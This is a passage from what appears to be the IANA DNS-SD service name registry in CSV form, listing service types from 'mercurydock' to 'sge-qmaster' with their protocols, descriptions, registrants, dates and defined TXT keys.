protocol,[Mediatap_GbR],[Mario_Pörner],2011-10-11,,,,,Defined TXT keys: Proprietary mercurydock,,tcp,Mercury Dock Assistant,[Spider_Electronics],[Kenny_Millar],2014-03-10,,,,,"Defined TXT keys: status, signature, ver" mesamis,,,Mes Amis,[David_Priest],[David_Priest],,,,,,Defined TXT keys: None mi-raysat,,,Mental Ray for Maya,[Autodesk],[Autodesk],,,,,,Defined TXT keys: None mieleathome,,tcp,Miele@home Protocol,[Miele_Cie_KG],[Nils_Langhammer],2014-03-13,,,,,Defined TXT keys: txtvers and proprietary keys mn-passage,,tcp,A Remote Control Application service used to control Computers on a Local Area Network,[Midnight_Oil_Enterprises_LLC],[Dan_Corkill],2013-07-09,,,,,Defined TXT keys: inherited from bonjour/iOS multipeer connectivity mn-passage,,udp,A Remote Control Application service used to control Computers on a Local Area Network,[Midnight_Oil_Enterprises_LLC],[Dan_Corkill],2013-07-09,,,,,Defined TXT keys: inherited from bonjour/iOS multipeer connectivity modolansrv,,,modo LAN Services,[Matt_Craig],[Matt_Craig],,,,,,Defined TXT keys: None mogeneti-auth,,tcp,Authentication service for Mogeneti Software Applications,[Mogeneti],[Bart_Rijpers],2012-09-26,,,,,Defined TXT keys: none moneysync,,,SplashMoney Synchronization Service,[Justin_Cepelak],[Justin_Cepelak],,,,,,Defined TXT keys: Proprietary moneyworks,,,MoneyWorks Gold and MoneyWorks Datacentre network service,[Rowan_Daniell],[Rowan_Daniell],,,,,,Defined TXT keys: None moodring,,,Bonjour Mood Ring tutorial program,[Daniel_Steinberg],[Daniel_Steinberg],,,,,,Defined TXT keys: txtvers=1 mood= mother,,,Mother script server protocol,[Jonathan],[Jonathan],,,,,,"Defined TXT keys: user, ssl" movieslate,,,MovieSlate digital clapperboard,[Cliff_Joyce],[Cliff_Joyce],,,,,,Defined TXT keys: Proprietary mp3sushi,,,MP3 Sushi,[Alexandre_Carlhian],[Alexandre_Carlhian],,,,,,Defined TXT keys: None mqtt,,,IBM MQ Telemetry Transport Broker,[AndySC],[AndySC],,,,,,"Defined TXT keys: topics=, eg topic=/info" mslingshot,,,Martian SlingShot,[Martin_Technology],[Martin_Technology],,,,,,"Defined TXT keys: displayName, passwordRequired, acceptsUpdates" msrps,,tcp,MSRP protocol over TLS,,,,2014-04-25,[RFC4976],,,Defined TXT keys: mumble,,,Mumble VoIP communication protocol,[Thorvald_Natvig],[Thorvald_Natvig],,,,,,Defined TXT keys: None musicmachine,,,Protocol for a distributed music playing service,[Johan_Mjones],[Johan_Mjones],,,,,,"Defined TXT keys: apiversion, passreq" mysync,,,MySync Protocol,[Martin_Redington],[Martin_Redington],,,,,,Defined TXT keys: None mttp,,,MenuTunes Sharing,[iThink_Software],[iThink_Software],,,,,,Defined TXT keys: None mxim-art2,,,Maxim Integrated Products Automated Roadtest Mk II,[Zach_Metzinger],[Zach_Metzinger],,,,,,Defined TXT keys: Proprietary mxim-ice,,,Maxim Integrated Products In-circuit Emulator,[Zach_Metzinger],[Zach_Metzinger],,,,,,Defined TXT keys: Proprietary mxs,,,MatrixStore,[Object_Matrix],[Object_Matrix],,,,,,"Defined TXT keys: None mxs.system.id= mxs.system.version= mxs.cluster.id=" nasmon,,tcp,Proprietary communication protocol for NAS Monitor,[Infinite_Loop],[Claus_Broch2],2012-10-09,,,,,Defined TXT keys: Proprietary nasmon,,udp,Proprietary communication protocol for NAS Monitor,[Infinite_Loop],[Claus_Broch2],2012-10-09,,,,,Defined TXT keys: Proprietary ncbroadcast,,,Network Clipboard Broadcasts,[Thom_McGrath],[Thom_McGrath],,,,,,Defined TXT keys: Contact The ZAZ Software ncdirect,,,Network Clipboard Direct Transfers,[Thom_McGrath],[Thom_McGrath],,,,,,Defined TXT keys: Contact The ZAZ Software ncount-issuer,,tcp,The issuer service in the n-Count electronic value transfer system,[n-Count_Technology_BV],[Eduard_de_Jong],2013-01-22,,,,,Defined TXT keys: None ncsyncserver,,,Network Clipboard Sync Server,[Thom_McGrath],[Thom_McGrath],,,,,,Defined TXT keys: Contact The ZAZ Software nodel,,tcp,Lightweight event based control protocol utilising JavaScript Object Notation,[Lumicom],[Michael_Cartmel],2013-02-07,,,,,Defined TXT keys: None neoriders,,udp,NeoRiders Client Discovery Protocol,[Jesse_W_Towner],[Jesse_W_Towner],,,,,,Defined TXT keys: None netrestore,,,NetRestore,[Mike_Bombich],[Mike_Bombich],,,,,,"Defined TXT keys: message, status, progress" netvu-video,,tcp,AD Group NetVu Connected Video,[AD_Holdings],[Kelvin_Lawson],2011-10-11,,,,,Defined TXT keys: none nextcap,,tcp,Proprietary communication protocol for NextCap capture solution,[NextDay_Aps],[Claus_Broch],2012-04-24,,,,,Defined TXT keys: Proprietary nextcap,,udp,Proprietary communication protocol for NextCap capture solution,[NextDay_Aps],[Claus_Broch],2012-04-24,,,,,Defined TXT keys: Proprietary ni,,tcp,National Instruments Network Device,[National_Instruments],[Joshua_Prewitt],2011-10-24,,,,,"Defined TXT keys: MAC, DevClass, ProdId, ProdName, SerialNo, Status, ImgPath, Comment" ni-rt,,tcp,National Instruments Real-Time Target,[National_Instruments],[Joshua_Prewitt],2011-10-24,,,,,"Defined TXT keys: MAC, OS, OSVer, ProcArch" ni-sysapi,,tcp,National Instruments System API Service,[National_Instruments],[Joshua_Prewitt],2011-10-24,,,,,"Defined TXT keys: MAC, Experts, Version" ntlx-arch,,,American Dynamics Intellex Archive Management Service,[Gary_Sands],[Gary_Sands],,,,,,"Defined TXT keys: txtvers, macaddress, protovers, model, serial" ntlx-ent,,,American Dynamics Intellex Enterprise Management Service,[Gary_Sands],[Gary_Sands],,,,,,"Defined TXT keys: txtvers, macaddress, protovers, model, serial" ntlx-video,,,American Dynamics Intellex Video Service,[Gary_Sands],[Gary_Sands],,,,,,"Defined TXT keys: txtvers, macaddress, protovers, model, serial, control, event" ntx,,udp,Tenasys,[Carl_Ellis],[Carl_Ellis],,,,,,Defined TXT keys: None obf,,,Observations Framework,[Matthew_Baker],[Matthew_Baker],,,,,,Defined TXT keys: version= objective,,,Means for clients to locate servers in an Objective (http://www.objective.com) instance.,[Marc_Bailey],[Marc_Bailey],,,,,,"Defined TXT keys: txtvers='1' type={'production'|'standby'|'test'|'demo'} protocol={['SOAP'],['CORBA']} transport=['iiop']|['http']" oca,,tcp,"Insecure OCP.1 protocol, which is the insecure TCP/IP implementation of the Object Control Architecture",[OCA_Alliance],[Stephan_van_Tienen],2012-10-11,,,,,Defined TXT keys: txtvers=1 protovers=x oca,,udp,"Insecure OCP.1 protocol, which is the insecure TCP/IP implementation of the Object Control Architecture",[OCA_Alliance],[Stephan_van_Tienen],2012-10-11,,,,,Defined TXT keys: txtvers=1 protovers=x ocasec,,tcp,"Secure OCP.1 protocol, which is the secure TCP/IP implementation of the Object Control Architecture",[OCA_Alliance],[Stephan_van_Tienen],2012-10-11,,,,,Defined TXT keys: txtvers=1 protovers=x ocasec,,udp,"Secure OCP.1 protocol, which is the secure TCP/IP implementation of the Object Control Architecture",[OCA_Alliance],[Stephan_van_Tienen],2012-10-11,,,,,Defined TXT keys: txtvers=1 protovers=x oce,,,Oce Common Exchange Protocol,[Dion_Slijp],[Dion_Slijp],,,,,,"Defined TXT keys: type, version" od-master,,,OpenDirectory Master,[Jason_Thorpe],[Jason_Thorpe],,,,,,Defined TXT keys: None odabsharing,,,OD4Contact,[Objective_Decision],[Objective_Decision],,,,,,Defined TXT keys: None odisk,,,Optical Disk Sharing,[Bob_Bradley_2],[Bob_Bradley_2],,,,,,"Defined TXT keys: sys, dkX" officetime-sync,,,OfficeTime Synchronization Protocol,[Support],[Support],,,,,,Defined TXT keys: None ofocus-conf,,,OmniFocus setting configuration,[Timothy_J_Wood],[Timothy_J_Wood],,,,,,Defined TXT keys: None ofocus-sync,,,OmniFocus document synchronization,[Timothy_J_Wood],[Timothy_J_Wood],,,,,,Defined TXT keys: Proprietary ola,,tcp,Web Interface for the Open Lighting Architecture Software,[Open_Lighting_Project],[Simon_Newton_2],2013-12-09,2014-02-25,,,,"Subtypes: _www-http Defined TXT keys: None" olpc-activity1,,udp,One Laptop per Child activity,[One_Laptop_per_Child],[One_Laptop_per_Child],,,,,,Defined TXT keys: Shared_Activity_Protocol_1.0 oma-bcast-sg,,,OMA BCAST Service Guide Discovery Service,[Stefan_Ekenberg],[Stefan_Ekenberg],,,,,,Defined TXT keys: None omadm-bootstrap,,tcp,Open Mobile Alliance (OMA) Device Management (DM) Bootstrap Server Discovery Service,[Open_Mobile_Alliance],[Open_Mobile_Alliance_Device_Management_DM_Working_Group],2011-08-19,,,,,Defined TXT keys: None omni-bookmark,,,OmniWeb,[The_Omni_Group],[The_Omni_Group],,,,,,Defined TXT keys: None omni-live,,,Service for remote control of Omnisphere virtual instrument,[Glenn_Olander_2],[Glenn_Olander_2],,,,,,Defined TXT keys: omni-livetxt.html openbase,,,OpenBase SQL,,,,,,,,Defined TXT keys: None opencu,,udp,Conferencing Protocol,[Marc_Manthey_2],[Marc_Manthey_2],,,,,,Defined TXT keys: None oprofile,,,oprofile server protocol,[Rob_Bradford],[Rob_Bradford],,,,,,Defined TXT keys: None oscit,,udp,Open Sound Control Interface Transfer,[Gaspard_Bucher],[Gaspard_Bucher],,,,,,Defined TXT keys: None ovready,,,ObjectVideo OV Ready Protocol,[Gary_Myers],[Gary_Myers],,,,,,"Defined TXT keys: txtvers, protovers" owhttpd,,,OWFS (1-wire file system) web server,[Paul_H_Alfille],[Paul_H_Alfille],,,,,,Defined TXT keys: txtvers parentcontrol,,,Remote Parental Controls,[John_Scalo],[John_Scalo],,,,,,Defined TXT keys: None passwordwallet,,,PasswordWallet Data Synchronization Protocol,[Sanford_Selznick],[Sanford_Selznick],,,,,,Defined TXT keys: None pcast,,,Mac OS X Podcast Producer Server,[Nick_Brosnahan],[Nick_Brosnahan],,,,,,Defined TXT keys: None p2pchat,,udp,Peer-to-Peer Chat (Sample Java Bonjour application),[Roger_Pantos],[Roger_Pantos],,,,,,Defined TXT keys: None p2pstorage-sec,,tcp,DataBOND p2p storage,[Dell],[Jessica_Zhang],2012-11-19,,,,,"Defined TXT keys: txtvers, machineid, status" pairandshare,,tcp,Pair & Share data protocol,[Intel],[Joshua_Boelter],2011-10-18,,,,,Defined TXT keys: Proprietary panoply,,tcp,Panoply multimedia composite transfer protocol,[Natarajan_Balasundar],[Natarajan_Balasundar],,,,,,Defined TXT keys: None parabay-p2p,,tcp,Parabay P2P protocol,[Vishnu_Varadaraj],[Vishnu_Varadaraj],,,,,,Defined TXT keys: None parity,,tcp,PA-R-I-Ty (Public Address - Radio - Intercom - Telefony),[ims_Info],[Oskar_Persano],2011-10-20,,,,,Defined TXT keys: Proprietary parity,,udp,PA-R-I-Ty (Public Address - Radio - Intercom - Telefony),[ims_Info],[Oskar_Persano],2011-10-20,,,,,Defined TXT keys: Proprietary pgpkey-hkp,,,Horowitz Key Protocol (HKP),[Marc_Horowitz],[Marc_Horowitz],,,,,,Defined TXT keys: None pgpkey-http,,,PGP Keyserver using HTTP/1.1,[Jeroen_Massar_3],[Jeroen_Massar_3],,,,,,"Defined TXT keys: path= normally: ""path=/pks/""" pgpkey-https,,,PGP Keyserver using HTTPS,[Jeroen_Massar_3],[Jeroen_Massar_3],,,,,,"Defined TXT keys: path= normally: ""path=/pks/""" pgpkey-ldap,,,PGP Keyserver using LDAP,[Jeroen_Massar_3],[Jeroen_Massar_3],,,,,,Defined TXT keys: None pgpkey-mailto,,,PGP Key submission using SMTP,[Jeroen_Massar_3],[Jeroen_Massar_3],,,,,,Defined TXT keys: user= photoparata,,,Photo Parata Event Photography Software,[Sam_Carleton],[Sam_Carleton],,,,,,Defined TXT keys: None photosmithsync,,tcp,Photosmith's iPad to Lightroom sync protocol,[Photosmith],[Chris_Horne],2011-10-27,,,,,Defined TXT keys: None pictua,,,Pictua Intercommunication Protocol,[Isaack_Rasmussen],[Isaack_Rasmussen],,,,,,Defined TXT keys: None piesync,,,pieSync Computer to Computer Synchronization,[Timothy_Wayper],[Timothy_Wayper],,,,,,Defined TXT keys: None piu,,,Pedestal Interface Unit by RPM-PSI,[James_Nikolai],[James_Nikolai],,,,,,Defined TXT keys: None pkixrep,,,Public Key Infrastructure Repository Locator Service,,,,,[RFC4386],,, poch,,,Parallel OperatiOn and Control Heuristic (Pooch),[Dean_Dauger],[Dean_Dauger],,,,,,Defined TXT keys: None podcastproxy,,tcp,Protocol for communication between Podcast,[Moritz_Schmale],[Moritz_Schmale],2011-10-07,,,,,Defined TXT keys: None pokeeye,,,"Communication channel for ""Poke Eye"" Elgato EyeTV remote controller",[Kristoffer_Lawson],[Kristoffer_Lawson],,,,,,Defined TXT keys: None powereasy-erp,,,PowerEasy ERP,[Ulaganathan_Sriramul],[Ulaganathan_Sriramul],,,,,,"Defined TXT keys: ip, port, name, instance, cgi-alias, major-version, minor-version, custom" powereasy-pos,,,PowerEasy Point of Sale,[Murthy_Parthasarathi],[Murthy_Parthasarathi],,,,,,"Defined TXT keys: ip, port, type, device-id, major-version, minor-version, custom" pplayer-ctrl,,,Piano Player Remote Control,[Juraj_Zopp],[Juraj_Zopp],,,,,,Defined TXT keys: Proprietary pres,,tcp,Presence,,,,,[RFC3861],,, pres,,udp,Presence,,,,,[RFC3861],,, presence,,,Peer-to-peer messaging / Link-Local Messaging,[XMPP_Registrar],[XMPP_Registrar],,,,,,"Defined TXT keys: See http://www.xmpp.org/registrar/linklocal.html Note: Registration updated May 2007. Was formerly listed as ""iChat AV"" (Apple's IM client for Mac OS X) with TXT keys: txtvers, port.p2pj, phsh, vc, 1st, AIM, msg, status, last When first shipped in Mac OS X 10.2, iChat's peer-to-peer messaging protocol was created to solve the problem of serverless messaging between peers on the same link. However, there is nothing inherent in the protocol that limits it to being only link-local; it was simply an artifact of iChat in Mac OS X 10.2 using link-local Multicast DNS to discover peers. With the advent of Wide-Area DNS-SD, it is also possible to use iChat's peer-to-peer messaging between machines on different links." print-caps,,,Retrieve a description of a device's print capabilities,[Troy_Bergstrand],[Troy_Bergstrand],,,,,,Defined TXT keys: None printopia,,tcp,"Port to allow for administration and control of ""Printopia"" application software, which provides printing services to mobile users",[Ecamm_Network_LLC],[Chris_Kent],2011-10-24,,,,,"Defined TXT keys: uuid = 55A346CB-C87C-4569-A4B0-248E6388893B vers = 1.0" profilemac,,,Profile for Mac medical practice management software,[David_Sinclair_2],[David_Sinclair_2],,,,,,Defined TXT keys: None prolog,,,Prolog,[Mike_Brady],[Mike_Brady],,,,,,Defined TXT keys: version= protonet,,,Protonet node and service discovery protocol,[Ali_Jelveh],[Ali_Jelveh],,,,,,"Defined TXT keys: version, notes" psap,,udp,Progal Service Advertising Protocol,[Soren_Weber],[Soren_Weber],,,,,,"Defined TXT keys: c0, c1, ..., cn" psia,,,Physical Security Interoperability Alliance Protocol,[Frank_Yeh],[Frank_Yeh],,,,,,"Defined TXT keys: txtvers, protovers" pstmailsync,,tcp,File synchronization protocol for Pst Mail Sync,[Arrow_Bit_SL],[Javier_Nigro],2012-04-26,,,,,Defined TXT keys: uuid= pstmailsync-ssl,,tcp,Secured file synchronization protocol for Pst Mail Sync,[Arrow_Bit_SL],[Javier_Nigro],2012-04-26,,,,,Defined TXT keys: uuid= ptnetprosrv2,,,PTNetPro Service,[Apple_Computer],[Apple_Computer],,,,,,"Defined TXT keys: None Profiling and performance analysis protocol for Shark 4.0 and BigTop." ptp-init,,tcp,Picture Transfer Protocol(PTP) Initiator,[Canon_Inc],[Tatsuhiko_Sakai],2011-10-03,,,,,"Defined TXT keys: srvver, mn, mf, md, srv, tid" ptp-req,,,PTP Initiation Request Protocol,[Mark_Wood],[Mark_Wood],,,,,,"Defined TXT keys: txtvers, guid, c0, c1, c2, ..., where the number of c_n attributes is variable" puzzle,,,Protocol used for puzzle games,[Michael_Thomason],[Michael_Thomason],,,,,,Defined TXT keys: None pvaccess,,tcp,Experimental Physics and Industrial Control System,[Matej_Sekoranja],[Matej_Sekoranja],2012-03-23,,,,,Defined TXT keys: None qbox,,,QBox Appliance Locator,[Geoff_Back_4],[Geoff_Back_4],,,,,,Defined TXT keys: None qttp,,,QuickTime Transfer Protocol,[Stuart_Cheshire_5],[Stuart_Cheshire_5],,,,,,Defined TXT keys: u= p= path= (Same as for _http._tcp) quad,,tcp,Distributed Game Data,[Niall_Hogg],[Niall_Hogg],2011-10-25,,,,,Defined TXT keys: Proprietary quinn,,,Quinn Game Server,[Simon_Haertel],[Simon_Haertel],,,,,,Defined TXT keys: None rakket,,,Rakket Client Protocol,[Orion_Reblitz_Richar],[Orion_Reblitz_Richar],,,,,,Defined TXT keys: None radiotag,,,RadioTAG: Event tagging for radio services,[Andy_Buckingham],[Andy_Buckingham],,,,,,Defined TXT keys: None radiovis,,,RadioVIS: Visualisation for radio services,[Andy_Buckingham],[Andy_Buckingham],,,,,,Defined TXT keys: None radioepg,,,RadioEPG: Electronic Programme Guide for radio services,[Andy_Buckingham],[Andy_Buckingham],,,,,,Defined TXT keys: None radioport,,tcp,RadioPort Message Service,[Bob_Iannucci],[Bob_Iannucci],2011-11-23,,,,,Defined TXT keys: NONE radioport,,udp,RadioPort Message Service,[Bob_Iannucci],[Bob_Iannucci],2011-11-23,,,,,Defined TXT keys: NONE raop,,,Remote Audio Output Protocol (AirTunes),[BonjourDev],[BonjourDev],,2011-10-14,,,,Defined TXT keys: None rbr,,,RBR Instrument Communication,[Greg_Johnson],[Greg_Johnson],,,,,,Defined TXT keys: None rce,,,PowerCard,[DeVoeSquared],[DeVoeSquared],,,,,,Defined TXT keys: None rdp,,,Windows Remote Desktop Protocol,[Jugaari],[Jugaari],,,,,,Defined TXT keys: None realplayfavs,,,RealPlayer Shared Favorites,[RealNetworks],[RealNetworks],,,,,,Defined TXT keys: None recipe-box,,tcp,The Recipe Box Exchange,[Corpus_Collusion],[Kathy_Tafel],2011-08-23,,,,,Defined TXT keys: txtvers recipe-sharing,,tcp,Recipe Sharing Protocol,[Daniel_G_Taylor],[Daniel_G_Taylor],2007-11,,,,,Defined TXT keys: [http://www.recipemanager.org/rsp/rsp10draft.html#dnssd] recolive-cc,,tcp,Remote Camera Control,[RecoLive_Sàrl],[Gabriele_Mondada],2012-08-29,,,,,"Defined TXT keys: txtvers, cid, nbd, cap" recolive-cc,,udp,Remote Camera Control,[RecoLive_Sàrl],[Gabriele_Mondada],2012-08-29,,,,,"Defined TXT keys: txtvers, cid, nbd, cap" recordit-itp,,tcp,Recordit Image Transport Protocol,[Freshout],[Ruben_Beltran_del_Rio_2],2014-04-14,,,,,Defined TXT keys: None remote,,,Remote Device Control Protocol,[Gregory_Dudek],[Gregory_Dudek],,,,,,"Defined TXT keys: txtvers= protovers= forground= version=" remoteburn,,,LaCie Remote Burn,[Serge_DE_LUCA],[Serge_DE_LUCA],,,,,,"Defined TXT keys: server_version, min_client_version" renderpipe,,,ARTvps RenderDrive/PURE Renderer Protocol,[Andrew_Hoddinott],[Andrew_Hoddinott],,,,,,Defined TXT keys: None rendezvouspong,,,RendezvousPong,[Math_Game_House_Soft],[Math_Game_House_Soft],,,,,,Defined TXT keys: None renkara-sync,,,Renkara synchronization protocol,[Michael_J_Primeaux],[Michael_J_Primeaux],,,,,,Defined TXT keys: None resol-vbus,,,RESOL VBus,[Daniel_Wippermann],[Daniel_Wippermann],,,,,,Defined TXT keys: None retrospect,,,Retrospect backup and restore service,[Michael_Marks],[Michael_Marks],,,,,,Defined TXT keys: None rfbc,,,Remote Frame Buffer Client (Used by VNC viewers in listen-mode),[Ole_Morten_Duesund],[Ole_Morten_Duesund],,,,,,"Defined TXT keys: server=dns-name/ip-address:port of currently displayed VNC server. Empty if not showing anything/available." rfid,,,RFID Reader Mach1(tm) Protocol,[Paul_Dietrich],[Paul_Dietrich],,,,,,Defined TXT keys: None rgb,,tcp,RGB Spectrum Device Discovery,[RGB_Spectrum],[Steve_Hershey],2011-10-10,,,,,"Defined TXT keys: Keyboard, Mouse, Option1, Option2, Option3, Option4, ModelName" riousbprint,,,Remote I/O USB Printer Protocol,[Rob_Newberry],[Rob_Newberry],,,,,,Defined TXT keys: See BonjourPrinting.pdf. roambot,,tcp,Roambot communication,[Roambotics_Inc],[Scott_Menor],2013-10-18,,,,,Defined TXT keys: None roku-rcp,,,Roku Control Protocol,[Don_Woodward],[Don_Woodward],,,,,,Defined TXT keys: txtvers=1 rql,,,RemoteQuickLaunch,[Daniel_Heffernan],[Daniel_Heffernan],,,,,,Defined TXT keys: None rr-disc,,,Robot Raconteur discovery,[Wason_Technology_LLC],[John_Wason],2014-01-27,,,,,Defined TXT keys: None rsmp-server,,,Remote System Management Protocol (Server Instance),[Geoff_Back_3],[Geoff_Back_3],,,,,,Defined TXT keys: apiver= rubygems,,,RubyGems GemServer,[Rich_Kilmer],[Rich_Kilmer],,,,,,Defined TXT keys: None rym-rrc,,tcp,Raymarine remote control protocol,[Raymarine_UK_Limited],[Geoffrey_Beer],2012-05-24,2012-06-04,,,,"Defined TXT keys: raymarine-mfd-rrc-version, raymarine-mfd-model, raymarine-mfd-serial" safarimenu,,,Safari Menu,[Jesus_De_Meyer],[Jesus_De_Meyer],,,,,,Defined TXT keys: None sallingbridge,,,Salling Clicker Sharing,[Jonas_Salling],[Jonas_Salling],,,,,,Defined TXT keys: None sallingclicker,,,Salling Clicker Service,[Jonas_Salling],[Jonas_Salling],,,,,,Defined TXT keys: None salutafugijms,,,Salutafugi Peer-To-Peer Java Message Service Implementation,[David_Walend],[David_Walend],,,,,,Defined TXT keys: SalutaProperties sandvox,,,Sandvox,[Karelia_Software],[Karelia_Software],,,,,,Defined TXT keys: None savagesoft,,tcp,Proprietary Client Server Protocol,[Andy_Savage],[Andy_Savage],2012-07-13,,,,,Defined TXT keys: None sc-golf,,,StrawberryCat Golf Protocol,[Phil_Willoughby],[Phil_Willoughby],,,,,,Defined TXT keys: None scanner,,,Bonjour Scanning,[Baskaran_Subramaniam],[Baskaran_Subramaniam],,,,,,Defined TXT keys: None schick,,,Schick,[Heiko_Kretschmer],[Heiko_Kretschmer],,,,,,Defined TXT keys: None scone,,,Scone,[James_Moore],[James_Moore],,,,,,Defined TXT keys: None scpi-raw,,,IEEE 488.2 (SCPI) Socket,[Nick_Barendt_3],[Nick_Barendt_3],,,,,,Defined TXT keys: None scpi-telnet,,,IEEE 488.2 (SCPI) Telnet,[Nick_Barendt_3],[Nick_Barendt_3],,,,,,Defined TXT keys: None sdsharing,,,Speed Download,[Yazsoft],[Yazsoft],,,,,,Defined TXT keys: None see,,,SubEthaEdit 2,[TheCodingMonkeys],[TheCodingMonkeys],,,,,,"Defined TXT keys: txtvers=1, name=, userid=, version=2" seeCard,,,seeCard,[Stefan_Pantke],[Stefan_Pantke],,,,,,Defined TXT keys: None senteo-http,,,Senteo Assessment Software Protocol,[Michael_Boyle],[Michael_Boyle],,,,,,Defined TXT keys: None sentillion-vlc,,,Sentillion Vault System,[George_Hartz],[George_Hartz],,,,,,Defined TXT keys: None sentillion-vlt,,,Sentillion Vault Systems Cluster,[George_Hartz],[George_Hartz],,,,,,Defined TXT keys: None sepvsync,,,SEPV Application Data Synchronization Protocol,[Kazuya_Ogata],[Kazuya_Ogata],,,,,,Defined TXT keys: Proprietary serendipd,,,serendiPd Shared Patches for Pure Data,[Hans_Christoph_Stein],[Hans_Christoph_Stein],,,,,,Defined TXT keys: None servereye,,,ServerEye AgentContainer Communication Protocol,[Andreas_Behr],[Andreas_Behr],,,,,,Defined TXT keys: None servermgr,,,Mac OS X Server Admin,[Jeff_Albouze],[Jeff_Albouze],,,,,,Defined TXT keys: None services,,,DNS Service Discovery,[Stuart_Cheshire_5][Marc_Krochmal],[Stuart_Cheshire_5][Marc_Krochmal],,,,,,Not a service type. Special name reserved for DNS-SD meta queries. sessionfs,,,Session File Sharing,[Anthony_Williams],[Anthony_Williams],,,,,,"Defined TXT keys: Text keys are the file extensions of any file the user plans to share, i.e. pdf, doc, mp3." sftp-ssh,,,Secure File Transfer Protocol over SSH,[Bryan_Cole],[Bryan_Cole],,,,,,Defined TXT keys: u= p= path= shifter,,,Window Shifter server protocol,[Antoine_Martin],[Antoine_Martin],,,,,,"Defined TXT keys: username The login username to use (optional) ssh_tunnel Whether an SSH tunnel must be used (required) iface The network interface the server is on (required - may be empty) version Software version (required) ID Server Identifier (requried)" shipsgm,,,Swift Office Ships,[Verek],[Verek],,,,,,Defined TXT keys: None shipsinvit,,,Swift Office Ships,[Verek],[Verek],,,,,,Defined TXT keys: None shoppersync,,,SplashShopper Synchronization Service,[Justin_Cepelak],[Justin_Cepelak],,,,,,Defined TXT keys: Proprietary shoutcast,,,Nicecast,[Rogue_Amoeba_2],[Rogue_Amoeba_2],,,,,,Defined TXT keys: None siminsufflator,,tcp,Simulated insufflator synchronisation protocol,[Niels_Castle_2],[Niels_Castle_2],2014-06-18,,,,,Defined TXT keys: None simmon,,,Medical simulation patient monitor syncronisation protocol,[Niels_Castle],[Niels_Castle],,,,,,Defined TXT keys: None simusoftpong,,,simusoftpong iPhone game protocol,[Anders_Svensson],[Anders_Svensson],,,,,,Defined TXT keys: Proprietary sipuri,,,Session Initiation Protocol Uniform Resource Identifier,[Jae_Woo_Lee],[Jae_Woo_Lee],,,,,,Defined TXT keys: Defined in URL specification sironaxray,,,Sirona Xray Protocol,[Michael_Dalpiaz],[Michael_Dalpiaz],,,,,,Defined TXT keys: Manufacturer=Sirona skillscapture,,tcp,The protocol is used to transfer database records between an iOS device to a Mac OS X computer,[Legentis_Ltd],[David_Elliman],2013-07-01,,,,,Defined TXT keys: None skillscapture,,udp,The protocol is used to transfer database records between an iOS device to a Mac OS X computer,[Legentis_Ltd],[David_Elliman],2013-07-01,,,,,Defined TXT keys: None skype,,,Skype,,,,,,,,"Defined TXT keys: platform, status, auth, rversion, version" sleep-proxy,,udp,Sleep Proxy Server,[Stuart_Cheshire_5][Marc_Krochmal],[Stuart_Cheshire_5][Marc_Krochmal],,,,,,Defined TXT keys: None slimcli,,,SliMP3 Server Command-Line Interface,[Dean_Blackketter_2],[Dean_Blackketter_2],,,,,,Defined TXT keys: None slimhttp,,,SliMP3 Server Web Interface,[Dean_Blackketter_2],[Dean_Blackketter_2],,,,,,Defined TXT keys: None slpda,,tcp,Remote Service Discovery in the Service Location,,,,,[RFC3832],,, slpda,,udp,Remote Service Discovery in the Service Location,,,,,[RFC3832],,, smartenergy,,,Smart Energy Profile,[Robby_Simpson],[Robby_Simpson],,,,,,Defined TXT keys: See http://www.zigbee.org/SmartEnergy smartsocket,,tcp,home control,[Robert_Diamond],[Robert_Diamond],2012-07-06,,,,,Defined TXT keys: None smb,,,Server Message Block over TCP/IP,,,,,,,,Defined TXT keys: u= p= path= sms,,,Short Text Message Sending and Delivery Status Service,[Christian_Flintrup],[Christian_Flintrup],,,,,,Defined TXT keys: Proprietary smsync,,,Syncellence file synchronization protocol,[Dialectro_Software],[Gord_Peters],2011-10-20,,,,,"Defined TXT keys: device= protocol= os= osver=" soap,,,Simple Object Access Protocol,[Andrew_Donoho],[Andrew_Donoho],,,,,,Defined TXT keys: None socketcloud,,,Socketcloud distributed application framework,[Robert_Goodyear],[Robert_Goodyear],,,,,,"Defined TXT keys: system, service, process, context, direction, status, progress, health, directive, flags" sox,,,Simple Object eXchange,[Igor_Mozolevsky],[Igor_Mozolevsky],,,,,,Defined TXT keys: Proprietary sparechange,,,SpareChange data sharing protocol,[Dave_Carrigan],[Dave_Carrigan],,,,,,Defined TXT keys: None spearcat,,,sPearCat Host Discovery,[Pierre_Frisch_2],[Pierre_Frisch_2],,,,,,"Defined TXT keys: applicationname=, osname=, sslsupport=" spidap,,tcp,Sierra Photonics Inc. data protocol,[Sierra_Photonics_Inc],[Support_Staff],2011-10-20,,,,,Defined TXT keys: None spincrisis,,,Spin Crisis,[Sphera_Software],[Sphera_Software],,,,,,Defined TXT keys: None spl-itunes,,,launchTunes,[David_Nanian_2],[David_Nanian_2],,,,,,Defined TXT keys: None spr-itunes,,,netTunes,[David_Nanian_2],[David_Nanian_2],,,,,,Defined TXT keys: None splashsync,,,SplashData Synchronization Service,[Justin_Cepelak],[Justin_Cepelak],,,,,,Defined TXT keys: Proprietary spres,,tcp,SongPresenter,[Tobias_Hoffmann],[Tobias_Hoffmann],2012-10-09,,,,,"Defined TXT keys: version, name" ss-sign,,tcp,Samsung Smart Interaction for Group Network,[Samsung],[Lee_HoJun],2013-01-03,,,,,Defined TXT keys: None ss-sign-disc,,udp,Samsung Smart Interaction for Group Network Discovery,[Samsung],[Lee_HoJun],2013-01-03,,,,,Defined TXT keys: None spx-hmp,,tcp,SpinetiX HMP,[SpinetiX_S_A],[Diego_Santa_Cruz],2011-10-18,,,,,"Defined TXT keys: txtvers=1 cport= the port for the content HTTP server (secondary HTTP server used for content publishing) mode= the mode in which the HMP device is currently operating, one of ""normal"", ""safe"" or ""recovery"" serial= serial number of the HMP device firmware= firmware version string (e.g., 2.1.0-0.1.7844) model= model string (e.g., HMP100)" ssh,,tcp,SSH Remote Login Protocol,[Tatu_Ylonen],[Tatu_Ylonen],,,,,,Defined TXT keys: u= p= ssscreenshare,,,Screen Sharing,,,,,,,,Defined TXT keys: None stingray-rpc,,tcp,Stingray Remote Procedure Call,[IK_SATPROF_LLC],[Sergey_Zubov_2],2014-05-02,,,,,Defined TXT keys: None stingray-remote,,tcp,Stingray remote control,[IK_SATPROF_LLC],[Sergey_Zubov_2],2014-05-02,,,,,Defined TXT keys: None strateges,,,Strateges,[Jean_Olivier_Lanctot],[Jean_Olivier_Lanctot],,,,,,Defined TXT keys: None sge-exec,,,Sun Grid Engine (Execution Host),[Bill_Van_Etten],[Bill_Van_Etten],,,,,,Defined TXT keys: None sge-qmaster,,,Sun Grid 